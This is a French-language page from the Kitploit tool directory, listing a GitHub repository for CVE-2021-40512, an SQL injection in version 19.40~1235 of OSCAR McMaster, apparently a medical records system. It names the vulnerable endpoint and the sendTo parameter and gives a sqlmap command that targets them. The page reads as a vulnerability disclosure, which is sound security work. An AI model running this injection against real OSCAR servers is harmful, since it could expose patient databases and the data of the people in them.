Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-40512 — CVE-2021-40512 OSCAR McMaster 19.40~1235 Vulnérabilité d'injection SQL. | Kitploit
Outils/GitHubGitHub/war4uthor/cve-2021-40512
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubwar4uthor/cve-2021-40512

CVE-2021-40512

CVE-2021-40512 OSCAR McMaster 19.40~1235 Vulnérabilité d'injection SQL.

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-40512 OSCAR McMaster 19.40~1235 Vulnérabilité d'injection SQL

Une vulnérabilité d'injection SQL existe dans la version 19.40~1235 d'OSCAR McMaster. Un attaquant malveillant peut exécuter des commandes SQL sur la base de données MySQL/MariaDB via le paramètre vulnérable sendTo situé au niveau du point d'accès /oscar/oscarEncounter/ViewConsultation.do.

[Espace réservé pour cve.mitre]

[Espace réservé pour nist]

Page JSP vulnérable :

ViewConsultation.do - paramètre sendTo

Payload vulnérable :

sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0&currentTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner

Découvert par Jack McBride, août 2021

Télécharger l’outil